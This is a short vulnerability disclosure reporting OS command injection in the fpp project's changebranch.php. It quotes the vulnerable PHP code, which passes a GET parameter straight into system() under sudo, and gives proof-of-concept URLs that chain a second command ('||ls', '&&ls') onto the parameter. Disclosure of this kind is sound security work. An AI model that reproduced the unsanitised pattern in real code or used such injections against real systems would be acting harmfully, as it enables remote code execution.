OS Command Injection in FalconChristmas/fpp

Valid
Reported on May 29th 2021

✍️ Description

Hi, there is a command injection vulnerability in https://github.com/FalconChristmas/fpp/blob/40a636c6e38442e3674db0b85fdfc5ed8a79b823/www/changebranch.php#L23

<?php
    echo "==================================================================================\n";

    $branch = $_GET['branch'];
    $command = "sudo /opt/fpp/scripts/git_branch " . $branch . " 2>&1";

    echo "Command: $command\n";
    echo "----------------------------------------------------------------------------------\n";
    system($command);
    echo "\n";
?>

You execute system without filtering user input

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/changebranch.php?branch=||ls or http://127.0.0.1/changebranch.php?branch=&&ls.

💥 Impact

RCE